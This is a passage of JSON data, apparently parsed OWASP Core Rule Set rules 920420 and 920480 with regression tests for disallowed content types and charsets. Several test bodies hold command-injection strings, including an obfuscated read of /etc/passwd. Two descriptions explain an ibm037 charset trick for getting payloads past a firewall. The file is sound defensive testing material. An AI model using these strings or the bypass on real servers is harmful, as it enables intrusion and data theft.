}, { "act_name": "tag", "lineno": 925, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 926, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 927, "act_quote": "quotes", "act_arg": "attack-protocol", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 928, "act_quote": "quotes", "act_arg": "paranoia-level/1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 929, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 930, "act_quote": "quotes", "act_arg": "OWASP_CRS/PROTOCOL-ENFORCEMENT", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 931, "act_quote": "quotes", "act_arg": "capec/1000/255/153", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 932, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 933, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 934, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": true, "oplineno": 917 } }, { "rule_id": "920420", "has_tests": true, "detection": { "variables": [ { "name": "REQUEST_HEADERS", "part": "Content-Type", "negated": false } ], "operator": { "type": "@rx", "argument": "^[^;\\s]+", "negated": false } }, "transformations": [ "none" ], "metadata": { "phase": "1", "message": "Request content type is not allowed by policy", "logdata": "%{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-protocol" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-protocol", "paranoia-level/1", "OWASP_CRS", "OWASP_CRS/PROTOCOL-ENFORCEMENT", "capec/1000/255/153" ] }, "test_cases": [ { "description": "", "test_id": 1, "request": { "method": "POST", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Content-Type": "application/x-www-form-urlencoded", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "test=value" }, "expected": { "should_block": false, "rule_ids": [ 920420 ] }, "malicious_patterns": [ { "location": "post_body", "value": "test=value" } ] }, { "description": "", "test_id": 2, "request": { "method": "POST", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Content-Type": "my-new-content-type", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "test" }, "expected": { "should_block": true, "rule_ids": [ 920420 ] }, "malicious_patterns": [ { "location": "post_body", "value": "test" } ] }, { "description": "", "test_id": 3, "request": { "method": "GET", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Content-Type": "my-new-content-type", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "test" }, "expected": { "should_block": true, "rule_ids": [ 920420 ] }, "malicious_patterns": [ { "location": "post_body", "value": "test" } ] }, { "description": "", "test_id": 4, "request": { "method": "PROPFIND", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Content-Type": "my-new-content-type", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "test" }, "expected": { "should_block": true, "rule_ids": [ 920420 ] }, "malicious_patterns": [ { "location": "post_body", "value": "test" } ] }, { "description": "Request content type is not allowed by policy (920420) from old modsec regressions", "test_id": 5, "request": { "method": "POST", "uri": "/", "headers": { "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Language": "en-us,en;q=0.5", "Content-Type": "multipart/; boundary=0000", "Host": "localhost", "Keep-Alive": "300", "Proxy-Connection": "keep-alive", "User-Agent": "OWASP CRS test agent" }, "data": "--0000\nContent-Disposition: form-data; name=\"name\"\n\nJohn Smith\n--0000\nContent-Disposition: form-data; name=\"email\"\n\njohn.smith@example.com\n--0000\nContent-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\nContent-Type: image/jpeg\n\nBINARYDATA\n--0000--\n" }, "expected": { "should_block": true, "rule_ids": [ 920420 ] }, "malicious_patterns": [ { "location": "post_body", "value": "--0000\nContent-Disposition: form-data; name=\"name\"\n\nJohn Smith\n--0000\nContent-Disposition: form-data; name=\"email\"\n\njohn.smith@example.com\n--0000\nContent-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\nContent-Type: image/jpeg\n\nBINARYDATA\n--0000--\n" } ] }, { "description": "Request content type is not allowed by policy (920420) from old modsec regressions", "test_id": 6, "request": { "method": "POST", "uri": "/", "headers": { "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Language": "en-us,en;q=0.5", "Content-Type": "multipart/foo; boundary=0000", "Host": "localhost", "Keep-Alive": "300", "Proxy-Connection": "keep-alive", "User-Agent": "OWASP CRS test agent" }, "data": "--0000\nContent-Disposition: form-data; name=\"name\"\n\nJohn Smith\n--0000\nContent-Disposition: form-data; name=\"email\"\n\njohn.smith@example.com\n--0000\nContent-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\nContent-Type: image/jpeg\n\nBINARYDATA\n--0000--\n" }, "expected": { "should_block": true, "rule_ids": [ 920420 ] }, "malicious_patterns": [ { "location": "post_body", "value": "--0000\nContent-Disposition: form-data; name=\"name\"\n\nJohn Smith\n--0000\nContent-Disposition: form-data; name=\"email\"\n\njohn.smith@example.com\n--0000\nContent-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\nContent-Type: image/jpeg\n\nBINARYDATA\n--0000--\n" } ] }, { "description": "Request content type is not allowed by policy (920420) from old modsec regressions", "test_id": 7, "request": { "method": "POST", "uri": "/", "headers": { "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Language": "en-us,en;q=0.5", "Content-Type": "application/foo; boundary=0000", "Host": "localhost", "Keep-Alive": "300", "Proxy-Connection": "keep-alive", "User-Agent": "OWASP CRS test agent" }, "data": "--0000\nContent-Disposition: form-data; name=\"name\"\n\nJohn Smith\n--0000\nContent-Disposition: form-data; name=\"email\"\n\njohn.smith@example.com\n--0000\nContent-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\nContent-Type: image/jpeg\n\nBINARYDATA\n--0000--\n" }, "expected": { "should_block": true, "rule_ids": [ 920420 ] }, "malicious_patterns": [ { "location": "post_body", "value": "--0000\nContent-Disposition: form-data; name=\"name\"\n\nJohn Smith\n--0000\nContent-Disposition: form-data; name=\"email\"\n\njohn.smith@example.com\n--0000\nContent-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\nContent-Type: image/jpeg\n\nBINARYDATA\n--0000--\n" } ] }, { "description": "", "test_id": 8, "request": { "method": "HEAD", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Content-Type": "my-new-content-type", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "test" }, "expected": { "should_block": true, "rule_ids": [ 920420 ] }, "malicious_patterns": [ { "location": "post_body", "value": "test" } ] }, { "description": "", "test_id": 9, "request": { "method": "OPTIONS", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Content-Type": "application/json", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "test" }, "expected": { "should_block": false, "rule_ids": [ 920420 ] }, "malicious_patterns": [ { "location": "post_body", "value": "test" } ] }, { "description": "", "test_id": 10, "request": { "method": "OPTIONS", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Content-Type": "application/soap+xml", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "test" }, "expected": { "should_block": false, "rule_ids": [ 920420 ] }, "malicious_patterns": [ { "location": "post_body", "value": "test" } ] }, { "description": "", "test_id": 11, "request": { "method": "OPTIONS", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Content-Type": "application", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "test" }, "expected": { "should_block": true, "rule_ids": [ 920420 ] }, "malicious_patterns": [ { "location": "post_body", "value": "test" } ] }, { "description": "Positive test: Ensure that the content type multipart/related is not allowed by the default configuration (ref.: 9EA-241022)", "test_id": 12, "request": { "method": "HEAD", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Content-Type": "multipart/related", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "test" }, "expected": { "should_block": true, "rule_ids": [ 920420 ] }, "malicious_patterns": [ { "location": "post_body", "value": "test" } ] }, { "description": "Positive test: Ensure that the content type multipart/related is not allowed by the default configuration (ref.: 9EA-241022)", "test_id": 13, "request": { "method": "HEAD", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Content-Type": "Multipart/Related", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "test" }, "expected": { "should_block": true, "rule_ids": [ 920420 ] }, "malicious_patterns": [ { "location": "post_body", "value": "test" } ] }, { "description": "", "test_id": 14, "request": { "method": "POST", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Content-Type": "text/plain" }, "data": "cmd=/bin/unxz -c /var/log/something_sensitive.xz" }, "expected": { "should_block": true, "rule_ids": [ 920420 ] }, "malicious_patterns": [ { "location": "post_body", "value": "cmd=/bin/unxz -c /var/log/something_sensitive.xz" } ] }, { "description": "", "test_id": 15, "request": { "method": "GET", "uri": "/", "headers": { "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Host": "localhost", "Proxy-Connection": "keep-alive", "User-Agent": "OWASP CRS test agent", "Content-Type": "text/plain" }, "data": "{\"foo\" : \";+cat+/e\\\\t\\\\*/pa\\\\?s\\\\wd\"}" }, "expected": { "should_block": true, "rule_ids": [ 920420 ] }, "malicious_patterns": [ { "location": "post_body", "value": "{\"foo\" : \";+cat+/e\\\\t\\\\*/pa\\\\?s\\\\wd\"}" } ] }, { "description": "", "test_id": 16, "request": { "method": "GET", "uri": "/", "headers": { "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Host": "localhost", "Proxy-Connection": "keep-alive", "User-Agent": "OWASP CRS test agent", "Content-Type": "application/x-amf" }, "data": "{\"foo\" : \";+cat+/e\\\\t\\\\*/pa\\\\?s\\\\wd\"}" }, "expected": { "should_block": true, "rule_ids": [ 920420 ] }, "malicious_patterns": [ { "location": "post_body", "value": "{\"foo\" : \";+cat+/e\\\\t\\\\*/pa\\\\?s\\\\wd\"}" } ] }, { "description": "", "test_id": 17, "request": { "method": "GET", "uri": "/", "headers": { "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Host": "localhost", "Proxy-Connection": "keep-alive", "User-Agent": "OWASP CRS test agent", "Content-Type": "application/octet-stream" }, "data": "{\"foo\" : \";+cat+/e\\\\t\\\\*/pa\\\\?s\\\\wd\"}" }, "expected": { "should_block": true, "rule_ids": [ 920420 ] }, "malicious_patterns": [ { "location": "post_body", "value": "{\"foo\" : \";+cat+/e\\\\t\\\\*/pa\\\\?s\\\\wd\"}" } ] }, { "description": "Positive test: Ensure that the content type multipart/related is not allowed by the default configuration (ref.: 9EA-241022)", "test_id": 18, "request": { "method": "POST", "uri": "/", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Content-Type": "multipart/related" }, "data": "foo" }, "expected": { "should_block": true, "rule_ids": [ 920420 ] }, "malicious_patterns": [ { "location": "post_body", "value": "foo" } ] }, { "description": "Positive test: Ensure that the content type application/cloudevents+json is not allowed by the default configuration (ref.: 9EA-241022)", "test_id": 19, "request": { "method": "POST", "uri": "/", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Content-Type": "application/cloudevents+json" }, "data": "{\"foo\":\"bar\"}" }, "expected": { "should_block": true, "rule_ids": [ 920420 ] }, "malicious_patterns": [ { "location": "post_body", "value": "{\"foo\":\"bar\"}" } ] }, { "description": "Positive test: Ensure that the content type application/cloudevents-batch+json is not allowed by the default configuration (ref.: 9EA-241022)", "test_id": 20, "request": { "method": "POST", "uri": "/", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Content-Type": "application/cloudevents-batch+json" }, "data": "{\"foo\":\"bar\"}" }, "expected": { "should_block": true, "rule_ids": [ 920420 ] }, "malicious_patterns": [ { "location": "post_body", "value": "{\"foo\":\"bar\"}" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 939, "variables": [ { "variable": "REQUEST_HEADERS", "variable_part": "Content-Type", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "^[^;\\s]+", "actions": [ { "act_name": "id", "lineno": 940, "act_quote": "no_quote", "act_arg": "920420", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 941, "act_quote": "no_quote", "act_arg": "1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 942, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 943, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 944, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 945, "act_quote": "quotes", "act_arg": "Request content type is not allowed by policy", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 946, "act_quote": "quotes", "act_arg": "%{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 947, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 948, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 949, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 950, "act_quote": "quotes", "act_arg": "attack-protocol", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 951, "act_quote": "quotes", "act_arg": "paranoia-level/1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 952, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 953, "act_quote": "quotes", "act_arg": "OWASP_CRS/PROTOCOL-ENFORCEMENT", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 954, "act_quote": "quotes", "act_arg": "capec/1000/255/153", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 955, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 956, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 957, "act_quote": "quotes", "act_arg": "tx.content_type=|%{tx.0}|", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "chain", "lineno": 958, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": true, "operator_negated": false, "oplineno": 939 } }, { "rule_id": null, "has_tests": false, "detection": { "variables": [ { "name": "TX", "part": "content_type", "negated": false } ], "operator": { "type": "@within", "argument": "%{tx.allowed_request_content_type}", "negated": true } }, "transformations": [ "lowercase" ], "metadata": {}, "attack_info": { "type": [], "severity": null, "tags": [] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 959, "variables": [ { "variable": "TX", "variable_part": "content_type", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@within", "operator_argument": "%{tx.allowed_request_content_type}", "actions": [ { "act_name": "t", "lineno": 960, "act_quote": "no_quote", "act_arg": "lowercase", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 961, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": true, "oplineno": 959 } }, { "rule_id": "920480", "has_tests": true, "detection": { "variables": [ { "name": "REQUEST_HEADERS", "part": "Content-Type", "negated": false } ], "operator": { "type": "@rx", "argument": "charset\\s*=\\s*[\\\"']?([^;\\\"'\\s]+)", "negated": false } }, "transformations": [ "none" ], "metadata": { "phase": "1", "message": "Request content type charset is not allowed by policy", "logdata": "%{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-protocol" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-protocol", "paranoia-level/1", "OWASP_CRS", "OWASP_CRS/PROTOCOL-ENFORCEMENT", "capec/1000/255/153" ] }, "test_cases": [ { "description": "", "test_id": 1, "request": { "method": "POST", "uri": null, "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Content-Type": "application/x-www-form-urlencoded; charset=utf-8", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "test=value" }, "expected": { "should_block": false, "rule_ids": [ 920480 ] }, "malicious_patterns": [ { "location": "post_body", "value": "test=value" } ] }, { "description": "", "test_id": 2, "request": { "method": "POST", "uri": null, "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Content-Type": "application/x-www-form-urlencoded;charset=UTF-8", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "test=value" }, "expected": { "should_block": false, "rule_ids": [ 920480 ] }, "malicious_patterns": [ { "location": "post_body", "value": "test=value" } ] }, { "description": "", "test_id": 3, "request": { "method": "POST", "uri": null, "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Content-Type": "application/x-www-form-urlencoded;charset=iso-8859-1", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "test=value" }, "expected": { "should_block": false, "rule_ids": [ 920480 ] }, "malicious_patterns": [ { "location": "post_body", "value": "test=value" } ] }, { "description": "", "test_id": 4, "request": { "method": "POST", "uri": null, "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Content-Type": "application/x-www-form-urlencoded;charset=ISO-8859-15", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "test=value" }, "expected": { "should_block": false, "rule_ids": [ 920480 ] }, "malicious_patterns": [ { "location": "post_body", "value": "test=value" } ] }, { "description": "", "test_id": 5, "request": { "method": "POST", "uri": null, "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Content-Type": "application/x-www-form-urlencoded; charset=windows-1252", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "test=value" }, "expected": { "should_block": false, "rule_ids": [ 920480 ] }, "malicious_patterns": [ { "location": "post_body", "value": "test=value" } ] }, { "description": "", "test_id": 6, "request": { "method": "POST", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Content-Type": "application/x-www-form-urlencoded; charset=utf-8", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "test=value" }, "expected": { "should_block": false, "rule_ids": [ 920480 ] }, "malicious_patterns": [ { "location": "post_body", "value": "test=value" } ] }, { "description": "", "test_id": 7, "request": { "method": "POST", "uri": null, "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Content-Type": "application/x-www-form-urlencoded; charset=garbage", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "test=value" }, "expected": { "should_block": true, "rule_ids": [ 920480 ] }, "malicious_patterns": [ { "location": "post_body", "value": "test=value" } ] }, { "description": "", "test_id": 8, "request": { "method": "POST", "uri": null, "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Content-Type": "application/x-www-form-urlencoded;charset=garbage", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "test=value" }, "expected": { "should_block": true, "rule_ids": [ 920480 ] }, "malicious_patterns": [ { "location": "post_body", "value": "test=value" } ] }, { "description": "", "test_id": 9, "request": { "method": "POST", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Content-Type": "application/x-www-form-urlencoded;charset=UTF-8", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "test=value" }, "expected": { "should_block": false, "rule_ids": [ 920480 ] }, "malicious_patterns": [ { "location": "post_body", "value": "test=value" } ] }, { "description": "", "test_id": 10, "request": { "method": "POST", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Content-Type": "application/x-www-form-urlencoded;charset=iso-8859-1", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "test=value" }, "expected": { "should_block": false, "rule_ids": [ 920480 ] }, "malicious_patterns": [ { "location": "post_body", "value": "test=value" } ] }, { "description": "", "test_id": 11, "request": { "method": "POST", "uri": null, "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Content-Type": "application/x-www-form-urlencoded;charset=ibm038", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "test=value" }, "expected": { "should_block": true, "rule_ids": [ 920480 ] }, "malicious_patterns": [ { "location": "post_body", "value": "test=value" } ] }, { "description": "", "test_id": 12, "request": { "method": "POST", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Content-Type": "application/x-www-form-urlencoded;charset=ISO-8859-15", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "test=value" }, "expected": { "should_block": false, "rule_ids": [ 920480 ] }, "malicious_patterns": [ { "location": "post_body", "value": "test=value" } ] }, { "description": "", "test_id": 13, "request": { "method": "POST", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Content-Type": "application/x-www-form-urlencoded; charset=windows-1252", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "test=value" }, "expected": { "should_block": false, "rule_ids": [ 920480 ] }, "malicious_patterns": [ { "location": "post_body", "value": "test=value" } ] }, { "description": "Trailing garbage after 'UTF-8'", "test_id": 14, "request": { "method": "POST", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-80" }, "data": "test=value" }, "expected": { "should_block": true, "rule_ids": [ 920480 ] }, "malicious_patterns": [ { "location": "post_body", "value": "test=value" } ] }, { "description": "", "test_id": 15, "request": { "method": "POST", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Content-Type": "application/x-www-form-urlencoded; charset=garbage", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "test=value" }, "expected": { "should_block": true, "rule_ids": [ 920480 ] }, "malicious_patterns": [ { "location": "post_body", "value": "test=value" } ] }, { "description": "", "test_id": 16, "request": { "method": "POST", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Content-Type": "application/x-www-form-urlencoded;charset=garbage", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "test=value" }, "expected": { "should_block": true, "rule_ids": [ 920480 ] }, "malicious_patterns": [ { "location": "post_body", "value": "test=value" } ] }, { "description": "Use of special charset to hide body payload.\nAdditional space in header.\nSee https://www.slideshare.net/SoroushDalili/waf-bypass-techniques-using-http-standard-and-web-servers-behaviour, slide 32.\n", "test_id": 17, "request": { "method": "POST", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Content-Type": "application/x-www-form-urlencoded; charset=ibm037" }, "data": "test=value" }, "expected": { "should_block": true, "rule_ids": [ 920480 ] }, "malicious_patterns": [ { "location": "post_body", "value": "test=value" } ] }, { "description": "Use of special charset to hide body payload.\nNo space in header.\nSee https://www.slideshare.net/SoroushDalili/waf-bypass-techniques-using-http-standard-and-web-servers-behaviour, slide 32.\n", "test_id": 18, "request": { "method": "POST", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Content-Type": "application/x-www-form-urlencoded;charset=ibm037" }, "data": "test=value" }, "expected": { "should_block": true, "rule_ids": [ 920480 ] }, "malicious_patterns": [ { "location": "post_body", "value": "test=value" } ] }, { "description": "", "test_id": 19, "request": { "method": "POST", "uri": null, "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Content-Type": "application/x-www-form-urlencoded;charset=ibm037;charset=UTF-8" }, "data": "test=value" }, "expected": { "should_block": true, "rule_ids": [ 920480 ] }, "malicious_patterns": [ { "location": "post_body", "value": "test=value" } ] }, { "description": "", "test_id": 20, "request": { "method": "POST", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Content-Type": "application/x-www-form-urlencoded; charset=\"utf-8\"", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "test=value" }, "expected": { "should_block": false, "rule_ids": [ 920480 ] }, "malicious_patterns": [ { "location": "post_body", "value": "test=value" } ] }, { "description": "", "test_id": 21, "request": { "method": "POST", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Content-Type": "application/x-www-form-urlencoded; charset='utf-8'", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "test=value" }, "expected": { "should_block": false, "rule_ids": [ 920480 ] }, "malicious_patterns": [ { "location": "post_body", "value": "test=value" } ] }, { "description": "", "test_id": 22, "request": { "method": "POST", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Content-Type": "application/x-www-form-urlencoded; charset=\"garbage\"", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "test=value" }, "expected": { "should_block": true, "rule_ids": [ 920480 ] }, "malicious_patterns": [ { "location": "post_body", "value": "test=value" } ] }, { "description": "", "test_id": 23, "request": { "method": "POST", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Content-Type": "application/x-www-form-urlencoded; charset=\"utf-88\"", "Accept": 